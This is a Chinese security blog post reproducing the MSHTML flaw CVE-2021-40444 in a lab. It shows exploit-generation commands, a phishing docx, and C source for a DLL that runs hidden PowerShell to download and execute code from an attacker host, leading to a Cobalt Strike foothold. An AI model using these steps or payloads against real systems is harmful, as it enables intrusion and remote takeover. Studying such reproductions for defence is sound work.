CVE-2021-40444 Microsoft MSHTML远程代码执行漏洞复现

admin 2022年1月30日14:50:10安全漏洞评论149 views1785字阅读5分57秒阅读模式

0x01 前言

该漏洞为Microsoft MSHTML远程代码执行漏洞,危险级别很高,执行简单

环境搭建:windows10(20H2)   kali

0x02 正文

Step1:

下载安装lcab,因为后续的复现要用到cab文件(一种win下的压缩包执行文件),又因为lcab的官网下载不了了,故通过Debian源下载.

wget http://ftp.debian.org/debian/pool/main/l/lcab/lcab_1.0b12.orig.tar.gz  //wget+url 获取链接文件
tar zxvf lcab_1.0b12.orig.tar.gz  //tar命令解压,随带一提压缩为zcvf
cd lcab-1.0b12  //进入文件夹
./configure  //命令,生成Makefile
make //从Makefile中读取命令,进行编译
sudo make install //从Makefile读取命令,进行安装

Step2:

https://github.com/lockedbyte/CVE-2021-40444下载exp,生成钓鱼文件(触发器)

python3 exploit.py generate test/calc.dll http://192.168.190.129:80   

生成的docx文件在/out中,发送文件至靶机,并开启http服务

python3 exploit.py host 80

Step3:

靶机环境处理,确保Activex控件开启(发现一般默认开启),确保防火墙关闭。CVE-2021-40444 Microsoft MSHTML远程代码执行漏洞复现发送docx文件至靶机后,双击点开文件即执行代码CVE-2021-40444 Microsoft MSHTML远程代码执行漏洞复现弹出计算机说明代码成功执行

Step4:

通过C2工具进行上线,这里用CS,msf也行不过麻烦一点。CS生成传送命令,将beacon传到靶机上。CVE-2021-40444 Microsoft MSHTML远程代码执行漏洞复现

CVE-2021-40444 Microsoft MSHTML远程代码执行漏洞复现

写C备着,准备生成dll,如果是msfvenom的话可以直接生成dll,这部分代码在reproduce有

#include <windows.h>
void exec(void) {
system("powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://你的ip:你的端口/a'))"");
return;
}
BOOL WINAPI DllMain(
HINSTANCE hinstDLL,
DWORD fdwReason,
LPVOID lpReserved )

{
switch( fdwReason )
{
case DLL_PROCESS_ATTACH:
exec();
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

生成dll,然后如之前一样生成docx钓鱼文件,发到靶机上

sudo apt-get install gcc-mingw-w64

i686-w64-mingw32-gcc -shared 1.c -o 1.dll

需要注意的是,因为httpd和cs服务端端口有冲突,需要调整,不过我嫌麻烦,直接两台虚拟机解决了

CVE-2021-40444 Microsoft MSHTML远程代码执行漏洞复现

最后CS上成功上机CVE-2021-40444 Microsoft MSHTML远程代码执行漏洞复现


0x03 总结

该POC的攻击过程:

1.客户打开Docx文件

2.document.xml.rels中存储了指向的恶意html网站链接

3.浏览器会自动打开网站链接

4.HTML中的JavaScript包含一个指向CAB文件的对象和一个指向INF文件的iframe.

5.CAB文件已打开,INF文件存储在%TEMP%Low目录中

6.由于CAB中存在路径遍历(ZipSlip)漏洞,因此可以将INF存储在%TEMP%中

7.使用“.cpl:”指令打开INF文件,导致通过rundll32侧面加载INF文件

注1:随着windows的更新,该漏洞被修复,本人亲试21H2已修复,20H2还未修复

注2:该过程只是简单复现,还未涉及到免杀,也没涉及漏洞的分析,接下来可能会继续更新,敬请期待

参考:https://www.freebuf.com/vuls/288712.html


原文始发于微信公众号(Th0r安全):CVE-2021-40444 Microsoft MSHTML远程代码执行漏洞复现

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月30日14:50:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  CVE-2021-40444 Microsoft MSHTML远程代码执行漏洞复现 http://cn-sec.com/archives/760556.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: